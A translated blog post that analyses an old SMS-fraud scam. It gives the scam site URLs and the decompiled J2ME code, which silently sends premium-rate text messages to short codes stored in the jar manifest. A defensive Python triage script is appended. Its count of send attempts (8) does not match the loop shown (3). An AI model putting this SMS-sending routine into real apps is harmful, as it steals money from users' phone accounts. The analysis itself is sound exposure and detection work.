
A post in the sandbox, or how I forgot that I have had an account for a long time.

Somehow, without noticing it, over the last couple of weeks I began looking at the headlines on Habr, and suddenly stumbled upon a post saying that you can get an invite by writing a post in the sandbox. After looking at what is in this sandbox, and inspired by 2.5 l of Bagbier bought to reminisce about my youth, I added a small note (text below). Since it was almost 3 am, I was finally going to go to bed. But suddenly, refreshing the page with my post, I saw a strange message: “Page not found (404 error)”. Meanwhile, an email turned up in my mailbox. Not bothering about the reasons for the 404 and pleased with the invite, I went to register. Imagine my surprise when I saw that the login was already taken. After that everything was simple: a password recovery link sent to my email, and I was logged in to the site. It turns out that I had already registered here back in July, but completely forgot about it. Two questions remain unclear: how did the invite come to me (is it related to my post or not), and where did that post actually disappear to? :)

Below is the text that disappeared, and I, at a loss, am off to bed:

As was written in the P.P.S. of this topic about VKontakte spam (which, by the way, some took for a fake), “While I was writing the post, I received as yet unverified information that the virus removes 600 rubles from the account.”
I have always been surprised by such “unverified information”, since it closely resembles “unverified information” of the form “send an SMS to a short number and get 600 rubles for free”, just the other way around. So, let's see what happens to the poor fellow who wants to get the coveted cash bonus for free.
We will follow his actions, although of course we will not repeat them exactly:
1. Go to the URL mentioned in the topic, http://vkpresents.ru/ , and press the "Login" button. Yes, indeed, not bad: "Your bonus at the moment is 500 rubles!"
2. Well, to get the bonus, you need to download the jar at http://bonus.vkpresents.ru/yes/go.php?id=1 . We download it.
3. The most interesting part: what does this mysterious jar do? First, let's unpack it. The contents are immediately pleasing: an ico.png file, a META-INF directory (standard for a jar) and a HotSex.class file (!)
All the magic actually lies in this hot file. As you know, Java programs are compiled into bytecode executed by a Java virtual machine, so this bytecode should be fairly easy to decompile to restore the original Java code. We use a Java decompiler, for example jad or jd-gui.
So, this is what the free cheese actually looks like:
    public void startApp() {
        String number;
        MessageConnection messageconnection;
        TextMessage textmessage;
        for (int i = 0; i < 3; ) {
            try {
                number = "sms://1171";
                if (i == 0)
                    number = "sms://" + getAppProperty("a");
                if (i == 1)
                    number = "sms://" + getAppProperty("b");
                if (i == 2)
                    number = "sms://" + getAppProperty("e");
                messageconnection = (MessageConnection)Connector.open(number);
                textmessage = (TextMessage)messageconnection.newMessage("text");
                textmessage.setPayloadText("" + getAppProperty("kis"));
                messageconnection.send(textmessage);
            }
            catch (Exception exception)
            {
            }
            ++i;
        }

...

Obviously, this code tries several times to send SMS messages to different numbers, with 1171 as the default. Let's see what else is in META-INF/MANIFEST.MF, which the code reads via getAppProperty():
kis: fasax 1340
wix: xasex 1340
a: 1171
b: 1161
c: 9099
d: 9099
e: 1161

Here they are, the very numbers to which the malicious program tries to send SMS :) The very first Google result for sending an SMS to number 1171 links to a discussion of crooks who offer to send a free SMS and in the end charge 5 USD for it. So, if we take into account that the code makes only 8 attempts to send an SMS, and each SMS costs 5 c.u., we get a rather impressive $40 that will be debited from the account if all the SMS are sent successfully. Fortunately, I don't know the exact amount, but the mentioned 600 rubles is probably an average value :)
So let's summarize. The scam is of course very weak; at least I think not a single Habr user will fall for it, and indeed it is 2009 outside, time to think up something more original :) Nevertheless, the class name HotSex.class was amusing; apparently this jar was taken from another scam, where it was offered to watch porn for free :)
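
The manual steps above (unpack the jar, look at the class, cross-check META-INF/MANIFEST.MF) can be scripted for triage. The following Python code is an added example, not part of the original post: it pulls the string constants out of each class file's constant pool and reports manifest attributes that the code references and whose values look like SMS short codes. The names `utf8_constants`, `triage` and `sample_jar` are introduced here, and the sample jar is constructed from the manifest values and strings shown above.

```python
import io, struct, zipfile

# Bytes following the tag for each non-Utf8 constant-pool entry (JVM class file format).
CP_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
            12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def utf8_constants(cls):
    """Return every CONSTANT_Utf8 string in a class file's constant pool."""
    if cls[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    count, = struct.unpack(">H", cls[8:10])
    pos, idx, out = 10, 1, []
    while idx < count:
        tag = cls[pos]
        if tag == 1:  # Utf8: u2 length, then the bytes
            n, = struct.unpack(">H", cls[pos + 1:pos + 3])
            out.append(cls[pos + 3:pos + 3 + n].decode("utf-8", "replace"))
            pos += 3 + n
        else:
            pos += 1 + CP_SIZES[tag]
        idx += 2 if tag in (5, 6) else 1  # long/double take two slots
    return out

def triage(jar_bytes):
    """Report SMS API use and manifest attributes the code reads that look like short codes."""
    jar = zipfile.ZipFile(io.BytesIO(jar_bytes))
    manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    attrs = dict(l.split(": ", 1) for l in manifest.splitlines() if ": " in l)
    strings = {s for n in jar.namelist() if n.endswith(".class")
               for s in utf8_constants(jar.read(n))}
    return {"sms_api": any("javax/wireless/messaging" in s for s in strings),
            "sms_urls": sorted(s for s in strings if s.startswith("sms://")),
            "short_codes": {k: v for k, v in attrs.items()
                            if k in strings and v.strip().isdigit() and len(v.strip()) <= 6}}

def sample_jar():
    """Constructed sample: manifest values from the post, class cut down to header + constant pool."""
    consts = ["javax/wireless/messaging/MessageConnection",
              "sms://1171", "sms://", "a", "b", "e", "kis"]
    pool = b"".join(b"\x01" + struct.pack(">H", len(c)) + c.encode() for c in consts)
    cls = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 47, len(consts) + 1) + pool
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "kis: fasax 1340\nwix: xasex 1340\n"
                   "a: 1171\nb: 1161\nc: 9099\nd: 9099\ne: 1161\n")
        z.writestr("HotSex.class", cls)
    return buf.getvalue()

if __name__ == "__main__":
    print(triage(sample_jar()))
```

Only attributes whose key also appears as a string constant in a class are reported, so on the constructed sample `c` and `d` are left out: the visible part of the decompiled code never reads them.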

Source: https://habr.com/ru/post/50072/

